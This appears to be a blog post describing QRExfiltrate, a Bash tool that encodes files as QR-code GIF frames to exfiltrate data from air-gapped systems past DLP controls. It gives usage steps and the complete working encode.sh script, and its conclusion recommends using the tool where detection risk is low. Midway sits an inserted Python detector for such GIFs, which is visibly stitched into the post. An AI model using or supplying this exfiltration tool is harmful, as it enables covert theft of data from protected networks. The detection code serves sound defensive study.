CYB3R53C


Jairo Rodriguez (Publisher)

Computer Engineer, OT Cybersecurity Specialist

DLP Evasion through QR code

While searching for recent hacking techniques and trends, I came across an interesting tool that uses QR code videos to decode binary data of files and then reassembles it using QR code reading applications.


This interesting proof of concept was developed by HackGit as a Bash shell script named QRExfiltrate.

This tool is a command line utility that converts any binary file into a QR code GIF. The data can then be reassembled visually, allowing the exfiltration of data from air-gapped systems. It was designed as a proof of concept to demonstrate a weakness in DLP software: the assumption that data will only leave the system via email, USB sticks, or other removable media.

The tool works by taking a binary file and converting it into a series of QR code images. These images are then combined into a GIF file whose frames can be read back with any standard QR code reader. This allows data to be exfiltrated without detection by most DLP systems, which inspect channels rather than what is shown on screen.

To use QRExfiltrate, open a command line and navigate to the directory containing the QRExfiltrate scripts.

Once you have done this, you can run the following command to convert your binary file into a QRcode GIF:

./encode.sh ./draft-taddei-ech4ent-introduction-00.txt output.gif

Usage:

encode.sh <inputfile> [outputfile]

Here <inputfile> is the path to the binary file you wish to convert and <outputfile> is the path to the desired output GIF file; if no output is specified, output.gif is used.

Once the command completes, you will have a GIF file containing the data from your binary file.

You can then transfer this GIF file as you wish and reassemble the data using any standard QR code reader.

Prerequisites

QRExfiltrate requires the following prerequisites:

  • qrencode
  • ffmpeg

Limitations

QRExfiltrate is limited by the size of the source data: QR encoding is capped at 64 bytes per frame so that every frame in the resulting image has a uniform size and shape. The conversion to QR codes also carries a lot of storage overhead; on average the resulting GIF is 50x larger than the original file. Finally, QRExfiltrate is limited by the capabilities of the QR code reader: if the reader cannot detect the QR codes in the GIF, the data cannot be reassembled.
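From the defender's side, the structure described above (one QR frame per 64-byte chunk, every frame the same square geometry, one GIF per file) is visible in the GIF container itself, without decoding a single QR code. The following is an added example, not part of QRExfiltrate or of this post: it walks the GIF block structure, reports frame count, palette size and frame sizes, and flags files with many identically sized square frames; the frame-count threshold is an assumption, and the sample GIF it builds is a constructed skeleton for testing, not real tool output.

```python
import struct
CHUNK_BYTES = 64  # payload per frame, as stated in the QRExfiltrate write-up

def _skip_subblocks(data, pos):
    """Advance past a chain of GIF data sub-blocks; return the offset after the 0x00 terminator."""
    while data[pos]:
        pos += data[pos] + 1
    return pos + 1

def gif_profile(data):
    """Return (frame_count, global_palette_size, set_of_frame_sizes) for raw GIF bytes."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    packed, pos, palette = data[10], 13, 0
    if packed & 0x80:  # global colour table present, 2^(n+1) entries of 3 bytes
        palette = 2 ** ((packed & 0x07) + 1)
        pos += 3 * palette
    frames, sizes = 0, set()
    while data[pos] != 0x3B:  # 0x3B is the GIF trailer
        block = data[pos]
        pos += 1
        if block == 0x21:  # extension: label byte, then data sub-blocks
            pos = _skip_subblocks(data, pos + 1)
        elif block == 0x2C:  # image descriptor: left, top, width, height, packed
            _, _, w, h, ipacked = struct.unpack_from("<HHHHB", data, pos)
            pos += 9
            if ipacked & 0x80:  # local colour table
                pos += 3 * 2 ** ((ipacked & 0x07) + 1)
            pos = _skip_subblocks(data, pos + 1)  # +1 skips the LZW minimum code size
            frames += 1
            sizes.add((w, h))
        else:
            raise ValueError("unexpected block 0x%02x" % block)
    return frames, palette, sizes

def looks_like_qr_exfil(data, min_frames=20):
    """Flag many identically sized square frames (assumed threshold) and estimate the payload."""
    frames, _, sizes = gif_profile(data)
    square_uniform = len(sizes) == 1 and all(w == h for w, h in sizes)
    return frames >= min_frames and square_uniform, frames * CHUNK_BYTES

def build_sample_gif(frames, width=8, height=None):
    """Constructed test input: a minimal animated GIF skeleton, not real QRExfiltrate output."""
    height = height or width
    out = b"GIF89a" + struct.pack("<HHBBB", width, height, 0x80, 0, 0) + bytes(6)  # 2-colour GCT
    for _ in range(frames):
        out += b"\x21\xF9\x04\x00\x0A\x00\x00\x00"  # graphic control extension
        out += b"\x2C" + struct.pack("<HHHHB", 0, 0, width, height, 0)
        out += b"\x02\x01\x44\x00"  # LZW min code size, one 1-byte sub-block, terminator
    return out + b"\x3B"
```

The second value returned by looks_like_qr_exfil is the upper bound on payload that many 64-byte frames could carry, which is useful for triage when a flagged GIF turns up in an image-sharing or print queue.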

encode.sh

#!/bin/bash
# requires qrencode and ffmpeg

# get file from input
file="$1"
output="$2"

# check if 2nd argument is provided (no spaces around '=' in a shell assignment)
if [ -z "$output" ]; then
    output="output.gif"
fi

# check if the file exists
if [ ! -f "$file" ]; then
    echo "File not found"
    exit 1
fi

# get size of file in bytes (BSD stat on macOS, GNU stat elsewhere)
if [ "$(uname)" == "Darwin" ]; then
    filesize=$(stat -f "%z" "$file")
else
    filesize=$(stat -c%s "$file")
fi

if [ "$filesize" -eq 0 ]; then
    echo "File is empty, nothing to encode"
    exit 1
fi

# size of each chunk; 64 bytes keeps every QR frame the same size and shape
chunksize=64

# number of chunks, rounded up so a partial final chunk is included and
# no empty chunk (which qrencode rejects) is produced when the file size
# is an exact multiple of the chunk size
nchunks=$(( (filesize + chunksize - 1) / chunksize ))

# create chunks
echo "Creating chunks..."
for i in $(seq 0 $((nchunks - 1))); do
    dd if="$file" of=chunk_"$i" bs="$chunksize" skip="$i" count=1
    echo "Created chunk $i"
done

# generate qrcode images
echo "Generating qrcodes..."
for i in $(seq 0 $((nchunks - 1))); do
    qrencode -t png -o frame_"$i".png -s 8 < chunk_"$i"
    echo "Generated qrcode $i"
done

# combine qrcode images into a gif at 10 frames per second;
# -r must come before -i to act as the input frame rate (ffmpeg ignores
# options placed after the output file), and the syntax is the same on macOS and Linux
echo "Creating gif..."
ffmpeg -y -r 10 -i frame_%d.png "$output"

# clean up
echo "Cleaning up..."
rm -f chunk_*
rm -f frame_*

echo "Done!"

Conclusion

QRExfiltrate is a powerful tool that can be used to bypass DLP systems and exfiltrate data in air-gapped networks. However, it is important to note that QRExfiltrate should be used with caution and only in situations where the risk of detection is low.

Credits: HackGit
